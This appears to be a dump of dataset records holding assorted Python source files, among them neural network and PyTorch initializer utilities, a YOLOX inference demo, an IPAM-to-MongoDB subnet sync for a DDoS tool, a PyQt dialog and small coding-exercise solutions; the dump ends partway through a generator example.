mp.quad(FFp_f,[-mp.inf,0],maxdegree =12,verbose = True)\n # avFp_m= mp.quad(FFp_m,[0,mp.inf],maxdegree =12,verbose = True)\n #\n # print(avFp_f,avFp_m)\n # avFp = avFp_f+avFp_m\n # ft = mp.re(avFp)*1.52e14\n #\n # print(ft)\n\n # Press[0,K] = sol[0]\n # Press[1,K] = sol[1]\n # Press[2,K] = sol[2]\n # Press[3,K] = 10**(Omeg)\n\n\n #~ print(Press)\n # Tangential stress saving\n # np.savetxt('kz_Alfven_pi2.out',Press)\n\n# Field Saving\n# files= open(\"sol_topo_wave\",\"w+\")\n# if Bound_nb ==2:\n# files.write(str({**dico1,**{\"Bound\":Bound_nb,'f1':str(((f-f0)).xreplace({**dico0,**dico1,**{C.x:Symbol('xx'),C.y:Symbol('yy')}})),'f2':str(((f_2-f0_2)).xreplace({**dico0,**dico1,**{C.x:Symbol('xx'),C.y:Symbol('yy')}}))}}))\n# if Bound_nb ==1:\n# files.write(str({**dico1,**{\"Bound\":Bound_nb,'f1':str(((f-f0)).xreplace({**dico0,**dico1,**{C.x:Symbol('xx')}}))}}))\n#\n# files.write(str(saveO.xreplace({e:dico1[zeta]})))\n# files.close()\n","repo_name":"monvilre/ToCCo","sub_path":"ToCCo.py","file_name":"ToCCo.py","file_ext":"py","file_size_in_byte":28026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72801719468","text":"\nimport numpy as np\nimport random\nimport copy\n\n\n\n\n#####################################################CLASSES####################################################\n\n\nclass network:\n\n #CONSTANTS:\n delta=1e-8\n\n\n\n\n def __init__(self,sizes):\n \"\"\"sizes: an array containing every layer's size\"\"\"\n #generates empty neurons\n self.neurons=np.empty(len(sizes),dtype=object)\n #must make one array not empty cuz of numpy weird stuff\n for i in range(len(sizes)):\n self.neurons[i]=np.array([0.0]*sizes[i])\n\n #generates empty weights\n self.weights=np.empty(len(sizes)-1,dtype=object)\n for i in range(len(sizes)-1):\n #what's the size of the current layer?\n fromLayer=sizes[i]\n #what's the size of the next layer?\n toLayer=sizes[i+1]\n #these are the x,y sizes of the array, respectively\n self.weights[i]=np.array([[0.0]*toLayer]*(fromLayer+1))\n \n #generates derivatives\n self.derivatives=copy.deepcopy(self.weights)\n self.backup=copy.deepcopy(self.weights) \n \n def activate(self):\n for x in range(len(self.neurons)-1):\n for i in range(len(self.neurons[x+1])):\n result=0\n #adds the weighted sum for a SINGLE NEURON\n for j in range(len(self.neurons[x])): \n result+=self.weights[x][j][i]*self.neurons[x][j]\n #adds the bias, which is the last element of the array\n result+=self.weights[x][len(self.weights[x])-1][i]\n result=sigmoid(result) \n self.neurons[x+1][i]=result\n \n #randomizes weights\n def initweights(self,multiplier):\n for i in range(len(self.weights)):\n for j in range(len(self.weights[i])):\n for k in range(len(self.weights[i][j])):\n self.weights[i][j][k]=sigmoid(random.randint(-2,2))*multiplier\n self.derivatives=copy.deepcopy(self.weights)\n\n def resetDerivatives(self):\n for i in range(len(self.derivatives)):\n for j in range(len(self.derivatives[i])):\n for k in range(len(self.derivatives[i][j])):\n self.derivatives[i][j][k]=0.0\n \n \n def clampDerivatives(self,sampleSize):\n \"\"\"gets the average of derivatives from total sample size\"\"\"\n for i in range(len(self.derivatives)):\n for j in range(len(self.derivatives[i])):\n for k in range(len(self.derivatives[i][j])):\n self.derivatives[i][j][k]=self.derivatives[i][j][k]/sampleSize\n\n\n def tweakWeights(self,learningRate):\n #print(\"The weights are tweaked at this rate:\")\n for i in range(len(self.weights)):\n for j in range(len(self.weights[i])):\n for k in range(len(self.weights[i][j])):\n #tweak weight opposite from gradient\n\n self.weights[i][j][k]-=self.derivatives[i][j][k]*learningRate\n #print(-self.derivatives[i][j]*learningRate)\n\n #USE ONLY FOR DEBUG\n def getCost(self,answer):\n \"\"\"compares the correct neural activations with the current activations(should be an array), returns a number\"\"\"\n \n result=0\n for i in range(len(answer)):\n result=result+abs(answer[i]-self.neurons[len(self.neurons)-1][i])\n return result\n \n def getDerivatives(self,answer):\n cost=0\n #gets cost of current network\n self.activate()\n for a in range(len(answer)):\n cost+=abs(answer[a]-self.neurons[len(self.neurons)-1][a])\n\n #tweaks every weight in order to get its derivative\n for i in range(len(self.weights)):\n for j in range(len(self.weights[i])):\n for k in range(len(self.weights[i][j])):\n #saves unchanged weight\n currentWeight=self.weights[i][j][k]\n \n self.weights[i][j][k]+=self.delta\n self.activate()\n alteredCost=0\n for l in range(len(answer)):\n alteredCost+=abs(answer[l]-self.neurons[len(self.neurons)-1][l])\n #gets the derivative\n deltaCost=alteredCost-cost\n self.derivatives[i][j][k]+=deltaCost/self.delta\n #restores the backup\n self.weights[i][j][k]=currentWeight\n \n def save(self):\n \"\"\"backup weights\"\"\"\n self.backup=copy.deepcopy(self.weights)\n \n def load(self):\n \"\"\"restores backup\"\"\"\n self.weights=copy.deepcopy(self.backup)\n \n def saveToData(self):\n \"\"\"saves the current weights to data file(named weights.txt), which is a plaintext file\"\"\"\n writtenStr=\"\"\n for i in range(len(self.weights)):\n for j in range(len(self.weights[i])):\n for k in range(len(self.weights[i][j])):\n writtenStr+=str(self.weights[i][j][k])\n writtenStr+=\" \"\n \n writtenStr+=\"\\n\"\n \n \n with open(\"weights.txt\",\"w\") as weightFile:\n weightFile.write(writtenStr)\n \n\n def loadFromData(self):\n with open(\"weights.txt\",\"r\") as weightFile:\n for i in range(len(self.weights)):\n currentarray=str.split(weightFile.readline())\n index=0\n for j in range(len(self.weights[i])):\n for k in range(len(self.weights[i][j])):\n self.weights[i][j][k]=float(currentarray[index])\n index+=1\n\n \n\n############################################################FUNCTIONS#####################################################################\ndef sigmoid(x):\n return(1/(1+np.exp(-x)))\n\n\n\n\n","repo_name":"Manaball123/python_projects","sub_path":"ai_project_1.2/neuralLib.py","file_name":"neuralLib.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20690310831","text":"import argparse\nimport os\n\nimport cv2\nimport numpy as np\nimport time\n\nimport onnxruntime\n\nfrom utils import preproc as preprocess , COCO_CLASSES, demo_postprocess, vis, multiclass_nms\n\nimport sys\nsys.path.append('../')\nfrom efficientstreamod.module import EfficientObjectDetection\n\n\nclass YOLOX(EfficientObjectDetection):\n def __init__(self, model_path, stream_url, input_shape=(640, 640), score_thr=0.3):\n super().__init__(stream_url)\n self.score_thr = score_thr\n self.input_shape = input_shape\n self.session = onnxruntime.InferenceSession(model_path)\n\n def inference(self, img):\n img, ratio = self.preprocess(img)\n output = self.session.run(None, {self.session.get_inputs()[0].name: img[None, :, :, :]})\n dets = self.postprocess(output, ratio)\n return dets\n\n def preprocess(self, img):\n img, ratio = preprocess(img, self.input_shape)\n return img, ratio\n\n def postprocess(self, output, ratio):\n predictions = demo_postprocess(output[0], self.input_shape)[0]\n boxes = predictions[:, :4]\n scores = predictions[:, 4:5] * predictions[:, 5:]\n boxes_xyxy = np.ones_like(boxes)\n boxes_xyxy[:, 0] = boxes[:, 0] - boxes[:, 2]/2.\n boxes_xyxy[:, 1] = boxes[:, 1] - boxes[:, 3]/2.\n boxes_xyxy[:, 2] = boxes[:, 0] + boxes[:, 2]/2.\n boxes_xyxy[:, 3] = boxes[:, 1] + boxes[:, 3]/2.\n boxes_xyxy /= ratio\n dets = multiclass_nms(boxes_xyxy, scores, nms_thr=0.45, score_thr=self.score_thr)\n return dets\n\n def visualize(self, img, dets):\n if dets is not None:\n final_boxes, final_scores, final_cls_inds = dets[:, :4], dets[:, 4], dets[:, 5]\n img = vis(img, final_boxes, final_scores, final_cls_inds,\n conf=self.score_thr, class_names=COCO_CLASSES)\n return img\n\n\ndef make_parser():\n parser = argparse.ArgumentParser(\"onnxruntime inference sample\")\n parser.add_argument(\n \"-m\",\n \"--model\",\n type=str,\n default=\"yolox_s.onnx\",\n help=\"Input your onnx model.\",\n )\n parser.add_argument(\n \"-i\",\n \"--image_path\",\n type=str,\n default='cars.mp4',\n help=\"Path to your input image.\",\n )\n parser.add_argument(\n \"-o\",\n \"--output_dir\",\n type=str,\n default='demo_output',\n help=\"Path to your output directory.\",\n )\n parser.add_argument(\n \"-s\",\n \"--score_thr\",\n type=float,\n default=0.3,\n help=\"Score threshould to filter the result.\",\n )\n parser.add_argument(\n \"--input_shape\",\n type=str,\n default=\"640,640\",\n help=\"Specify an input shape for inference.\",\n )\n return parser\n\n\nif __name__ == '__main__':\n args = make_parser().parse_args()\n\n input_shape = tuple(map(int, args.input_shape.split(',')))\n\n yolox = YOLOX(args.model, args.image_path, input_shape, args.score_thr)\n yolox.start_stream(grid_type=4)\n time.sleep(1)\n while True:\n img,dets = yolox.get_result()\n dets = np.array(dets)\n if img is not None:\n img = yolox.visualize(img, dets)\n cv2.imshow('result', img)\n if cv2.waitKey(1) == ord('q'):\n break\n time.sleep(0.03)","repo_name":"rubythalib33/EfficientStreamOD","sub_path":"sample/yolox_s.py","file_name":"yolox_s.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27756209145","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.signal import stft\nimport meteordoctorlib as mdl\n\n## Settings\nplot_spec = False\n\n## Some constants\ntarget_buffer_len = 8000\nNOVERLAP = 0.8\nspec_xy = 256\nnorm_aspect = 1.5\n\nMINF = 500\nMAXF = 1500\n\n## Filename\nfn = \"sample_meteor_data_v4.wav\"\n\n### Load main file\ndef process_wav_file(fn): \n \n fs, file_len, main_buffer = mdl.load_wav_file(fn)\n \n length = (fs/1000)*target_buffer_len\n length = mdl.power_bit_length(length)\n\n buf_no = int(np.floor(file_len/(length)))\n\n print(\"Length of buffer: \", length/fs, \"s\")\n print(\"%i buffers filled\" % buf_no)\n for i in range(0, buf_no*2-1):\n ## We're going to do buffer overlap to ensure that nothing is missed!\n print(\"Processing buffer %i of %i\" % (i+1 , buf_no*2))\n ## Read audio data into memory\n shifter = i/2 ## 1/2 1/2 buffer overlap\n in_frame = mdl.import_buffer(main_buffer, fs, shifter*length, (shifter+1)*length)\n #print(\"Data Len: \", len(in_frame))\n ## Lets do stuff!\n NFFT = mdl.calculate_nseg(length)\n\n #print(\"NFFT,\", NFFT)\n f, t, Zxx = stft(in_frame, fs=fs, nperseg=NFFT, noverlap=NFFT*NOVERLAP)\n mag = np.abs(Zxx)\n \n signal_dict = {}\n signal_dict['data'] = in_frame\n signal_dict['fs'] = fs\n minf = NFFT*MINF/fs\n maxf = NFFT*MAXF/fs\n signal_dict['magnitude'] = mdl.normalise_spectrogram(mag[int(minf):int(maxf), ...], newx=int(spec_xy*norm_aspect), newy=int(spec_xy))\n mdl.save_buffer(signal_dict)\n if plot_spec:\n plt.subplot(2, 1, 1)\n plt.pcolormesh(t, f, mag, cmap='viridis')\n plt.ylabel('Frequency [Hz]')\n plt.xlabel('Time [sec]')\n plt.ylim((MINF,MAXF))\n \n plt.subplot(2, 1, 2)\n mag = np.square(mag)\n plt.pcolormesh(t, f, mag, cmap='viridis')\n plt.ylabel('Frequency [Hz]')\n plt.xlabel('Time [sec]')\n plt.ylim((MINF,MAXF))\n plt.show()\n \nprocess_wav_file(fn)\n","repo_name":"m0zjo-code/meteordoctor","sub_path":"wav_client.py","file_name":"wav_client.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33297797350","text":"from tensorflow.keras.preprocessing.image import load_img\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom tensorflow.keras.models import load_model\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport os\n\ndef search(dirname):\n img_list = []\n for (path, dir, files) in os.walk(dirname):\n for filename in files:\n ext = os.path.splitext(filename)[-1]\n if ext == '.jpg':\n img_list.append(path+'/'+filename)\n return img_list\n\n# load and prepare the image\ndef load_image(filename):\n # load the image\n img = load_img(filename, target_size=(200, 200))\n # convert to array\n img = img_to_array(img)\n # reshape into a single sample with 3 channels\n img = np.expand_dims(img, axis=0)\n # img scaling\n img /= 255\n\n return img\n\nimg_list_1 = search('data_natural_image/test/temp')\n\nmodel = load_model('./natural_image_model.h5')\n\nfor i in img_list_1:\n img = load_image(i)\n # predict the class\n result = model.predict(img)\n preds_value = np.argmax(result, axis=-1)[0]\n\n print(preds_value)\n\n","repo_name":"MinseongS/AI-study","sub_path":"CNN/natural-image/natural_image_test.py","file_name":"natural_image_test.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44462316957","text":"import sys\n\ninput = sys.stdin.readline\nN = int(input())\narr = list(map(int, input().split()))\nre_arr = list(reversed(arr))\nasc = [1] * N\ndesc = [1] * N\n\nfor i in range(N):\n for j in range(i):\n if arr[i] > arr[j]:\n asc[i] = max(asc[i], asc[j] + 1)\n if re_arr[i] > re_arr[j]:\n desc[i] = max(desc[i], desc[j] + 1)\nprint(max([i + j for i, j in zip(asc, reversed(desc))])-1)\n","repo_name":"joohyun333/programmers","sub_path":"백준/DP/가장 긴 바이토닉 부분 수열.py","file_name":"가장 긴 바이토닉 부분 수열.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70231898666","text":"# 백준 1316번 \n# 그룹 단어 체커\n\nN = int(input())\ncount = 0\n\nfor i in range(N):\n word = input()\n prev_w = []\n duplication = 0\n for idx in range(len(word)):\n if word[idx] not in prev_w:\n prev_w.append(word[idx]) \n elif word[idx] != prev_w[-1]: # prev_w 리스트에 있지만 가장 마지막 알파벳과 다른 경우\n duplication = 1\n break\n if duplication == 0:\n count+=1 \n \n\nprint(count)\n ","repo_name":"noweymik/Coding-Test-Study","sub_path":"BAEKJOON/2023/1316.py","file_name":"1316.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"29970334696","text":"\"\"\"\nService object by Collections.\n\"\"\"\nfrom dynaconf import settings\n\nfrom .auth import IpamSession\nfrom .database import MongoDB, RedisDB\nfrom .service_ipam import IpamService\n\n\nclass IpamFacade:\n \"\"\"\n class Facade Ipam\n \"\"\"\n\n def __init__(self):\n self._cache = RedisDB(8)\n self._session = IpamSession.session()\n self._mongo = MongoDB()\n\n def get_vrf(self):\n \"\"\"\n Realiza busca por todas as VRFs cadastradas no IPAM. A VRF é responsavel pelo NEXT_HOP para cada subnet.\n\n :param: None\n :return: Dict = { vrf_id:\n { next_hop: str, vrf_name: str, vrf_id: str, sections_list: list }\n }\n \"\"\"\n print(\"Iniciando busca por vrf...\")\n\n vrf_data: dict = {}\n\n get_vrf = IpamService.get(\n controller=\"vrf\",token= self._session\n )\n\n for vrf in get_vrf[\"data\"]:\n next_hop = vrf.get(settings.RANGER_NEXT_HOP)\n vrf_name = vrf.get(\"name\")\n vrf_id = vrf.get(\"vrfId\")\n sections_list = list(vrf.get(\"sections\").split(\";\"))\n\n vrf_data[vrf_id] = {\n \"next_hop\":next_hop,\n \"vrf_name\":vrf_name,\n \"vrf_id\":vrf_id,\n \"sections_list\":sections_list\n }\n\n print(\"VRF`s encontradas com sucesso: %s\" % vrf_data)\n return {\"status\":\"success\", \"message\":\"vrf sucesso\", \"data\":vrf_data}\n\n def get_sections(self):\n \"\"\"\n Realiza busca por todas as sections cadastradas no IPAM. A section é responsavel por agrupar as subnets.\n :return: Dict = { sections_list: list }\n :param: None\n \"\"\"\n print(\"Iniciando busca de sections ipam...\")\n\n sections_data = []\n get_sections = IpamService.get(controller=\"sections\",token=self._session)\n\n for section in get_sections[\"data\"]:\n section_name = section.get(\"name\")\n section_id = section.get(\"id\")\n if section_name in [\"ASN-INVALIDOS\", \"ASN-CGNAT\"]:\n continue\n\n sections_data.append({\n \"name\": section_name,\n \"id\":section_id\n })\n\n print(\"Sections encontradas com sucesso: %s\" % sections_data)\n return {\"status\":\"success\", \"message\":\"sections sucesso\", \"data\":sections_data}\n\n def get_subnets(self,sections_id: str, sections_name: str, vrf_item: dict):\n \"\"\"\n Realiza busca por todas as subnets cadastradas no IPAM. A subnet é responsavel por agrupar as redes.\n :return: Dict = { subnet_list: list }\n :param: sections_id: str ex.: 1\n :param: sections_name: str ex.: 265066\n :param: vrf_item: dict ex.: { next_hop: str, vrf_name: str, vrf_id: str, sections_list: list }\n \"\"\"\n print(\"Iniciando busca subneting no ipam...\")\n\n subnet_data = []\n params = {\n \"filter_match\": \"full\",\n \"filter_by\": \"mask\",\n \"filter_value\": \"24\"\n }\n\n get_subnet = IpamService.get_filter_object(\n controller=f\"sections/{sections_id}/subnets/\",token=self._session, params=params\n )\n\n for subnet in get_subnet[\"data\"]:\n subnet_id = subnet.get(\"id\")\n subnet_community_ddos = subnet.get(\"custom_community_ddos\")\n subnet_vrf = subnet.get(\"vrfId\")\n subnet_networks = subnet.get(\"subnet\")\n whitelist = subnet.get(\"custom_networks_whitelist\")\n if whitelist == \"1\":\n self._cache.save(key=f\"whitelist_{subnet_networks}\", obj=subnet_networks, ex_token=89000)\n\n if not vrf_item.get(subnet_vrf):\n next_hop = \"0.0.0.0\"\n print(\n f\"*****>>>>> Subnet sem VRF <<<<<******* - net: {subnet_networks} - asn: {sections_name}\"\n )\n else:\n next_hop = vrf_item[subnet_vrf][\"next_hop\"]\n\n\n subnet_dict = {\n \"_id\" : subnet_id,\n \"id\" : subnet_id,\n \"net\" : subnet_networks,\n \"asn\" : sections_name,\n \"hop\" : next_hop,\n \"whitelist\" : whitelist,\n \"community_ddos\": int(subnet_community_ddos),\n \"guard\" : \"0\"\n }\n self._cache.save(key=f\"network_{subnet_networks}\", obj=subnet_networks, ex_token=89000)\n self._mongo.find_and_update_by_options(coll=\"subnet\", value_id={\"_id\" : subnet_id}, value_update=subnet_dict)\n subnet_data.append(subnet_dict)\n return {\"status\":\"success\", \"message\":\"subneting sucesso\", \"data\":subnet_data}\n","repo_name":"deivisonmarteleto/fastnetmon_sync_ranger","sub_path":"src/app/facade_ipam.py","file_name":"facade_ipam.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"33512306029","text":"from PyQt6 import uic\nfrom PyQt6.QtCore import QTimer, pyqtSignal\nfrom PyQt6.QtGui import QBrush, QColor\nfrom PyQt6.QtWidgets import QDialog, QColorDialog, QGraphicsScene\n\nfrom structures.points import NEMid, Nucleoside\nfrom structures.strands import Strand\nfrom ui.dialogs.sequence_editor.display_area import SequenceDisplayArea\nfrom ui.dialogs.sequence_editor.sequence_editor import SequenceEditor\n\n\nclass StrandConfig(QDialog):\n updated = pyqtSignal()\n\n max_thickness = 50\n\n def __init__(self, parent, strand: Strand):\n super().__init__(parent)\n uic.loadUi(\"ui/dialogs/strand_config/strand_config.ui\", self)\n\n self.strand = strand\n self.setWindowTitle(\n f\"Strand #{self.strand.strands.index(self.strand) + 1} Config\"\n )\n self._sequencing()\n self._color_selector()\n self._thickness_selector()\n self._strand_params()\n\n self.strand.styles.highlight()\n\n self.finished.connect(self.when_finished)\n\n def when_finished(self) -> None:\n self.strand.styles.reset()\n self.updated.emit()\n\n def _strand_params(self):\n \"\"\"Setup parameters based on strand parameters.\"\"\"\n self.NEMids_in_strand.setValue(len(self.strand.items.by_type(NEMid)))\n self.nucleosides_in_strand.setValue(len(self.strand.items.by_type(Nucleoside)))\n self.closed.setChecked(self.strand.closed)\n self.empty.setChecked(self.strand.empty)\n self.thickness.blockSignals(True)\n self.thickness.setValue(round(min((self.strand.styles.thickness.value, 99))))\n self.thickness.blockSignals(False)\n\n def _sequencing(self):\n \"\"\"Set up the sequencing area.\"\"\"\n\n # add the strands display area\n self.sequence_display = SequenceDisplayArea(None, self.strand.sequence)\n self.sequencing_area.layout().insertWidget(0, self.sequence_display)\n\n def sequencing_editor_clicked():\n \"\"\"Worker for when 'sequence editor' is clicked.\"\"\"\n self.strand.sequence = SequenceEditor.fetch_sequence(\n self.parent(), self.strand.sequence, self.strand.has_complements()\n )\n self.sequence_display.bases = self.strand.sequence\n self.updated.emit()\n\n self.sequence_editor.clicked.connect(sequencing_editor_clicked)\n\n def _color_selector(self):\n \"\"\"Set up the color selector.\"\"\"\n\n # set up the color preview box\n self.color_preview.setScene(QGraphicsScene())\n\n def update_color_preview():\n \"\"\"Update the color preview box to the current strand color.\"\"\"\n self.color_preview.scene().setBackgroundBrush(\n QBrush(QColor(*self.strand.styles.color.value))\n )\n\n # strand color could change for many reasons other than them using the color\n # selector so for ease we will just automatically update the preview box\n # every .1 seconds with the current strand color (this is an unideal\n # solution, but it works perfectly fine)\n update_color_preview()\n update_color_looper = QTimer(self)\n update_color_looper.timeout.connect(update_color_preview)\n update_color_looper.start(100)\n\n def color_chooser_clicked():\n \"\"\"Worker for when the color chooser box is clicked.\"\"\"\n self.auto_color.setChecked(False)\n self.strand.styles.color.value = QColorDialog.getColor().getRgb()\n self.strand.styles.color.automatic = False\n self.strand.strands.style()\n update_color_preview()\n self.updated.emit()\n\n self.color_chooser.clicked.connect(color_chooser_clicked)\n\n # update the auto color checkbox to the current state of the strand\n self.auto_color.setChecked(self.strand.styles.color.automatic)\n\n def auto_color_checked(checked):\n \"\"\"Worker for when the auto color checkbox is clicked.\"\"\"\n if checked:\n self.strand.styles.color.automatic = True\n else:\n self.strand.styles.color.automatic = False\n self.updated.emit()\n\n self.auto_color.stateChanged.connect(auto_color_checked)\n\n def _thickness_selector(self):\n \"\"\"Set up the thickness selector.\"\"\"\n\n def slider_to_thickness():\n \"\"\"Map the thickness slider to the strand thickness.\"\"\"\n return int((self.thickness.value() * self.max_thickness) / 99)\n\n def thickness_to_slider():\n \"\"\"Map the strand thickness to the thickness slider.\"\"\"\n return int((self.strand.styles.thickness.value * 99) / self.max_thickness)\n\n # update the thickness based on the current strand's thickness\n self.auto_thickness.setChecked(self.strand.styles.thickness.automatic)\n\n def thickness_changed():\n \"\"\"Worker for when the thickness slider is changed.\"\"\"\n self.auto_thickness.setChecked(False)\n self.strand.styles.thickness.value = slider_to_thickness()\n self.updated.emit()\n\n self.thickness.setValue(thickness_to_slider())\n self.thickness.valueChanged.connect(thickness_changed)\n\n def auto_thickness_checked(checked):\n \"\"\"Worker for when the auto thickness checkbox is checked.\"\"\"\n self.strand.styles.thickness.automatic = checked\n self.updated.emit()\n\n self.auto_thickness.stateChanged.connect(auto_thickness_checked)\n","repo_name":"NATuG3/NATuG3","sub_path":"ui/dialogs/strand_config/strand_config.py","file_name":"strand_config.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"38729765395","text":"from collections import deque\n\ndef solution(s):\n answer = 0\n s = deque(list(s))\n \n while s:\n x = s.popleft()\n answer += 1\n \n cnt_x, cnt_not_x = 1, 0\n for _ in range(len(s)):\n ch = s.popleft()\n \n if x == ch:\n cnt_x += 1\n else:\n cnt_not_x += 1\n \n if cnt_x == cnt_not_x: \n break\n \n elif not s:\n break\n \n return answer\n\n\nif __name__ == \"__main__\":\n print(solution(\"banana\")) # 3\n print(solution(\"abracadabra\")) # 6\n print(solution(\"aaabbaccccabba\")) # 3","repo_name":"nstalways/Algorithm-Questions","sub_path":"01_Strings/Programmers_문자열_나누기.py","file_name":"Programmers_문자열_나누기.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7647878015","text":"\"\"\"\nAdopted from AllenNLP:\n https://github.com/allenai/allennlp/blob/v0.6.1/allennlp/nn/initializers.py\n\nAn initializer is just a PyTorch function.\nHere we implement a proxy class that allows us\nto register them and supply any additional function arguments\n(for example, the ``mean`` and ``std`` of a normal initializer)\nas named arguments to the constructor.\nThe available initialization functions are\n* `\"normal\" `_\n* `\"uniform\" `_\n* `\"constant\" `_\n* `\"eye\" `_\n* `\"dirac\" `_\n* `\"xavier_uniform\" `_\n* `\"xavier_normal\" `_\n* `\"kaiming_uniform\" `_\n* `\"kaiming_normal\" `_\n* `\"orthogonal\" `_\n* `\"sparse\" `_\n* :func:`\"block_orthogonal\" `\n* :func:`\"uniform_unit_scaling\" `\n\"\"\"\nimport re\nimport math\nfrom typing import Callable, List, Tuple, Type, Iterable\nimport itertools\n\nimport torch\nimport torch.nn.init\n\nfrom stog.utils import logging\nfrom stog.utils.checks import ConfigurationError\n\nlogger = logging.init_logger() # pylint: disable=invalid-name\n\n\ndef uniform_unit_scaling(tensor: torch.Tensor, nonlinearity: str = \"linear\"):\n \"\"\"\n An initaliser which preserves output variance for approximately gaussian\n distributed inputs. This boils down to initialising layers using a uniform\n distribution in the range ``(-sqrt(3/dim[0]) * scale, sqrt(3 / dim[0]) * scale)``, where\n ``dim[0]`` is equal to the input dimension of the parameter and the ``scale``\n is a constant scaling factor which depends on the non-linearity used.\n See `Random Walk Initialisation for Training Very Deep Feedforward Networks\n `_\n for more information.\n Parameters\n ----------\n tensor : ``torch.Tensor``, required.\n The tensor to initialise.\n nonlinearity : ``str``, optional (default = \"linear\")\n The non-linearity which is performed after the projection that this\n tensor is involved in. This must be the name of a function contained\n in the ``torch.nn.functional`` package.\n Returns\n -------\n The initialised tensor.\n \"\"\"\n size = 1.\n # Estimate the input size. This won't work perfectly,\n # but it covers almost all use cases where this initialiser\n # would be expected to be useful, i.e in large linear and\n # convolutional layers, as the last dimension will almost\n # always be the output size.\n for dimension in list(tensor.size())[:-1]:\n size *= dimension\n\n activation_scaling = torch.nn.init.calculate_gain(nonlinearity, tensor)\n max_value = math.sqrt(3 / size) * activation_scaling\n\n return tensor.uniform_(-max_value, max_value)\n\n\ndef block_orthogonal(tensor: torch.Tensor,\n split_sizes: List[int],\n gain: float = 1.0) -> None:\n \"\"\"\n An initializer which allows initializing model parameters in \"blocks\". This is helpful\n in the case of recurrent models which use multiple gates applied to linear projections,\n which can be computed efficiently if they are concatenated together. However, they are\n separate parameters which should be initialized independently.\n Parameters\n ----------\n tensor : ``torch.Tensor``, required.\n A tensor to initialize.\n split_sizes : List[int], required.\n A list of length ``tensor.ndim()`` specifying the size of the\n blocks along that particular dimension. E.g. ``[10, 20]`` would\n result in the tensor being split into chunks of size 10 along the\n first dimension and 20 along the second.\n gain : float, optional (default = 1.0)\n The gain (scaling) applied to the orthogonal initialization.\n \"\"\"\n data = tensor.data\n sizes = list(tensor.size())\n if any([a % b != 0 for a, b in zip(sizes, split_sizes)]):\n raise ConfigurationError(\"tensor dimensions must be divisible by their respective \"\n \"split_sizes. Found size: {} and split_sizes: {}\".format(sizes, split_sizes))\n indexes = [list(range(0, max_size, split))\n for max_size, split in zip(sizes, split_sizes)]\n # Iterate over all possible blocks within the tensor.\n for block_start_indices in itertools.product(*indexes):\n # A list of tuples containing the index to start at for this block\n # and the appropriate step size (i.e split_size[i] for dimension i).\n index_and_step_tuples = zip(block_start_indices, split_sizes)\n # This is a tuple of slices corresponding to:\n # tensor[index: index + step_size, ...]. This is\n # required because we could have an arbitrary number\n # of dimensions. The actual slices we need are the\n # start_index: start_index + step for each dimension in the tensor.\n block_slice = tuple([slice(start_index, start_index + step)\n for start_index, step in index_and_step_tuples])\n data[block_slice] = torch.nn.init.orthogonal_(tensor[block_slice].contiguous(), gain=gain)\n\n\ndef zero(tensor: torch.Tensor) -> None:\n return tensor.data.zero_()\n\ndef lstm_hidden_bias(tensor: torch.Tensor) -> None:\n \"\"\"\n Initialize the biases of the forget gate to 1, and all other gates to 0,\n following Jozefowicz et al., An Empirical Exploration of Recurrent Network Architectures\n \"\"\"\n # gates are (b_hi|b_hf|b_hg|b_ho) of shape (4*hidden_size)\n tensor.data.zero_()\n hidden_size = tensor.shape[0] // 4\n tensor.data[hidden_size:(2 * hidden_size)] = 1.0\n","repo_name":"jcyk/gtos","sub_path":"generator_data/stog/modules/initializers.py","file_name":"initializers.py","file_ext":"py","file_size_in_byte":6493,"program_lang":"python","lang":"en","doc_type":"code","stars":183,"dataset":"github-code","pt":"37"} +{"seq_id":"20677046343","text":"# // Write a function called sameFrequency. Given two positive integers, find out if the two numbers have the same frequency of digits.\n\n# // Your solution MUST have the following complexities:\n\n# // Time: O(N)\n\n# // Sample Input:\n\n# // sameFrequency(182,281) // true\n# // sameFrequency(34,14) // false\n# // sameFrequency(3589578, 5879385) // true\n# // sameFrequency(22,222) // false\n\n\ndef sameFrequency(num1, num2):\n freq = {}\n\n str_num1 = str(num1)\n str_num2 = str(num2)\n\n if len(str_num1) != len(str_num2):\n return False\n\n for digit1, digit2 in zip(str_num1, str_num2):\n if digit1 in freq:\n freq[digit1] += 1\n else:\n freq[digit1] = 1\n\n if digit2 in freq:\n freq[digit2] -= 1\n else:\n freq[digit2] = 1\n\n for value in freq.values():\n if value != 0:\n return False\n\n return True\n","repo_name":"jonnynotbravo/DS-Algos","sub_path":"sameFrequency.py","file_name":"sameFrequency.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6375556365","text":"# 函数生成器send方法\ndef range2(n):\n\n count = 0\n while count < n:\n print('count', count)\n count += 1\n sign = yield count\n if sign == 'stop':\n break\n print(\"---sign\", sign)\n return 3333\n\n\nnew_range = range2(3) # 0,1,2\nn1 = next(new_range)\nprint(new_range)\n# n2 = next(new_range)\nnew_range.send(\"stop\")\n# send方法\n# 